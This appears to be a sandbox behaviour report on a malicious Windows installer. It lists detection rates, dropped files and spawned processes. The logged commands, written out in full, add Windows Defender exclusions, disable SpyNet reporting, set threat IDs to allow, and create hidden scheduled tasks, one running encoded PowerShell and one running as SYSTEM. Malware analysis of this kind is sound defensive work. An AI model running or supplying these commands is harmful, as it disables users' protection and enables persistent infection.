Source: file.exe |
ReversingLabs: Detection: 42% |
Source: C:\Users\user\AppData\Local\Temp\7zS872.tmp\Install.exe |
ReversingLabs: Detection: 73% |
Source: C:\Users\user\AppData\Local\Temp\7zS872.tmp\Install.exe |
Virustotal: Detection: 64% |
Source: C:\Users\user\AppData\Local\Temp\7zSFD85.tmp\Install.exe |
ReversingLabs: Detection: 46% |
Source: C:\Users\user\AppData\Local\Temp\LhLAIbjVjtdXSeCjh\NRKtMpzzQqeBbPa\iZqzyKf.exe |
ReversingLabs: Detection: 73% |
Source: C:\Windows\Temp\fwhiGQHhSfnZUzkc\sjPeeWCTnrqbGVf\GPooAyT.exe |
ReversingLabs: Detection: 73% |
Source: file.exe |
Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE |
Source: C:\Users\user\Desktop\file.exe |
Code function: 0_2_0040553A FindFirstFileA, |
Source: C:\Users\user\Desktop\file.exe |
Code function: 0_2_004055DE __EH_prolog,FindFirstFileW,AreFileApisANSI,FindFirstFileA, |
Source: C:\Users\user\Desktop\file.exe |
File opened: C:\Users\user\AppData\Local\Temp\7zSFD85.tmp\ |
Source: C:\Users\user\Desktop\file.exe |
File opened: C:\Users\user\AppData\Local\Temp\7zSFD85.tmp\__data__\ |
Source: C:\Users\user\Desktop\file.exe |
File opened: C:\Users\user\AppData\Local\Temp\ |
Source: C:\Users\user\Desktop\file.exe |
File opened: C:\Users\user\AppData\Local\ |
Source: C:\Users\user\Desktop\file.exe |
File opened: C:\Users\user\ |
Source: C:\Users\user\Desktop\file.exe |
File opened: C:\Users\user\AppData\ |
Source: powershell.exe, 00000011.00000002.445905069.000001B130DC7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.478781107.0000000003521000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://crl.globalsign.net/root-r2.crl0 |
Source: powershell.exe, 00000011.00000002.438569177.000001B128E84000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.353292546.000001B11A255000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.434983992.000001B128D4E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.333195759.000001B118F58000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://nuget.org/NuGet.exe |
Source: powershell.exe, 00000011.00000002.350039488.000001B11A082000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://pesterbdd.com/images/Pester.png |
Source: powershell.exe, 00000011.00000002.324046164.000001B118CE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.481155183.0000000003F51000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name |
Source: powershell.exe, 00000011.00000002.344365256.000001B119BAD000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0 |
Source: powershell.exe, 00000011.00000002.350039488.000001B11A082000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html |
Source: powershell.exe, 00000011.00000002.333195759.000001B118F58000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/ |
Source: powershell.exe, 00000011.00000002.333195759.000001B118F58000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/Icon |
Source: powershell.exe, 00000011.00000002.333195759.000001B118F58000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/License |
Source: powershell.exe, 00000011.00000002.350039488.000001B11A082000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://github.com/Pester/Pester |
Source: powershell.exe, 00000011.00000002.438569177.000001B128E84000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.353292546.000001B11A255000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.434983992.000001B128D4E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.333195759.000001B118F58000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://nuget.org/nuget.exe |
Source: powershell.exe, 00000011.00000002.344365256.000001B119BAD000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://oneget.org |
Source: powershell.exe, 00000011.00000002.344365256.000001B119BAD000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://oneget.orgX |
Source: powershell.exe, 00000011.00000002.344365256.000001B119BAD000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://oneget.orgformat.ps1xmlagement.dll2040.missionsand |
Source: Install.exe, 00000002.00000002.586322785.000000000B52A000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/> |
Source: C:\Users\user\AppData\Local\Temp\LhLAIbjVjtdXSeCjh\NRKtMpzzQqeBbPa\iZqzyKf.exe |
Process created: Commandline size = 3260 |
Source: C:\Users\user\AppData\Local\Temp\7zS872.tmp\Install.exe |
File deleted: C:\Windows\SysWOW64\GroupPolicyKWFQc |
Source: C:\Users\user\AppData\Local\Temp\7zS872.tmp\Install.exe |
File created: C:\Windows\system32\GroupPolicy\gpt.ini |
Source: C:\Users\user\Desktop\file.exe |
Code function: 0_2_004162A6 |
Source: C:\Users\user\Desktop\file.exe |
Code function: 0_2_0040E5A5 |
Source: C:\Users\user\Desktop\file.exe |
Code function: 0_2_004126B0 |
Source: C:\Users\user\Desktop\file.exe |
Code function: 0_2_00403A01 |
Source: C:\Users\user\Desktop\file.exe |
Code function: 0_2_00418EF1 |
Source: C:\Users\user\Desktop\file.exe |
Code function: 0_2_00418FCB |
Source: C:\Users\user\Desktop\file.exe |
Code function: String function: 00403A9C appears 33 times |
Source: C:\Users\user\Desktop\file.exe |
Code function: String function: 00413954 appears 179 times |
Source: file.exe, 00000000.00000002.591622508.0000000000427000.00000002.00000001.01000000.00000003.sdmp |
Binary or memory string: OriginalFilename7zS.sfx.exe, vs file.exe |
Source: file.exe |
Binary or memory string: OriginalFilename7zS.sfx.exe, vs file.exe |
Source: C:\Windows\SysWOW64\cmd.exe |
Process created: C:\Windows\SysWOW64\reg.exe REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32 |
Source: Joe Sandbox View |
Dropped File: C:\Users\user\AppData\Local\Temp\7zS872.tmp\Install.exe A506223F4CA78C5C90CA3E02D00A1FEF0E74B7050712C2A5E7EBAA160FA6C879 |
Source: C:\Users\user\Desktop\file.exe |
File read: C:\Users\user\Desktop\file.exe |
Source: file.exe |
Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ |
Source: C:\Users\user\Desktop\file.exe |
Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers |
Source: unknown |
Process created: C:\Users\user\Desktop\file.exe C:\Users\user\Desktop\file.exe |
Source: C:\Users\user\Desktop\file.exe |
Process created: C:\Users\user\AppData\Local\Temp\7zSFD85.tmp\Install.exe .\Install.exe |
Source: C:\Users\user\AppData\Local\Temp\7zSFD85.tmp\Install.exe |
Process created: C:\Users\user\AppData\Local\Temp\7zS872.tmp\Install.exe .\Install.exe /S /site_id "525403" |
Source: C:\Users\user\AppData\Local\Temp\7zS872.tmp\Install.exe |
Process created: C:\Windows\SysWOW64\forfiles.exe "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64& |
Source: C:\Windows\SysWOW64\forfiles.exe |
Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
Source: C:\Users\user\AppData\Local\Temp\7zS872.tmp\Install.exe |
Process created: C:\Windows\SysWOW64\forfiles.exe "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64& |
Source: C:\Windows\SysWOW64\forfiles.exe |
Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
Source: C:\Windows\SysWOW64\forfiles.exe |
Process created: C:\Windows\SysWOW64\cmd.exe /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64& |
Source: C:\Windows\SysWOW64\forfiles.exe |
Process created: C:\Windows\SysWOW64\cmd.exe /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64& |
Source: C:\Windows\SysWOW64\cmd.exe |
Process created: C:\Windows\SysWOW64\reg.exe REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32 |
Source: C:\Windows\SysWOW64\cmd.exe |
Process created: C:\Windows\SysWOW64\reg.exe REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32 |
Source: C:\Windows\SysWOW64\cmd.exe |
Process created: C:\Windows\SysWOW64\reg.exe REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64 |
Source: C:\Windows\SysWOW64\cmd.exe |
Process created: C:\Windows\SysWOW64\reg.exe REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64 |
Source: C:\Users\user\AppData\Local\Temp\7zS872.tmp\Install.exe |
Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /CREATE /TN "gqlLYiBSq" /SC once /ST 05:56:18 /F /RU "user" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==" |
Source: C:\Windows\SysWOW64\schtasks.exe |
Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
Source: C:\Users\user\AppData\Local\Temp\7zS872.tmp\Install.exe |
Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /run /I /tn "gqlLYiBSq" |
Source: C:\Windows\SysWOW64\schtasks.exe |
Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
Source: unknown |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA== |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: C:\Windows\System32\gpupdate.exe "C:\Windows\system32\gpupdate.exe" /force |
Source: C:\Windows\System32\gpupdate.exe |
Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
Source: C:\Users\user\AppData\Local\Temp\7zS872.tmp\Install.exe |
Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /DELETE /F /TN "gqlLYiBSq" |
Source: unknown |
Process created: C:\Windows\System32\gpscript.exe gpscript.exe /RefreshSystemParam |
Source: C:\Windows\SysWOW64\schtasks.exe |
Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
Source: C:\Users\user\AppData\Local\Temp\7zS872.tmp\Install.exe |
Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /CREATE /TN "bGZpGlqvDNKjraWjlZ" /SC once /ST 17:28:00 /RU "SYSTEM" /TR "\"C:\Users\user\AppData\Local\Temp\LhLAIbjVjtdXSeCjh\NRKtMpzzQqeBbPa\iZqzyKf.exe\" d8 /site_id 525403 /S" /V1 /F |
Source: C:\Windows\SysWOW64\schtasks.exe |
Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
Source: unknown |
Process created: C:\Users\user\AppData\Local\Temp\LhLAIbjVjtdXSeCjh\NRKtMpzzQqeBbPa\iZqzyKf.exe C:\Users\user\AppData\Local\Temp\LhLAIbjVjtdXSeCjh\NRKtMpzzQqeBbPa\iZqzyKf.exe d8 /site_id 525403 /S |
Source: C:\Users\user\AppData\Local\Temp\LhLAIbjVjtdXSeCjh\NRKtMpzzQqeBbPa\iZqzyKf.exe |
Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD 
\"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAc |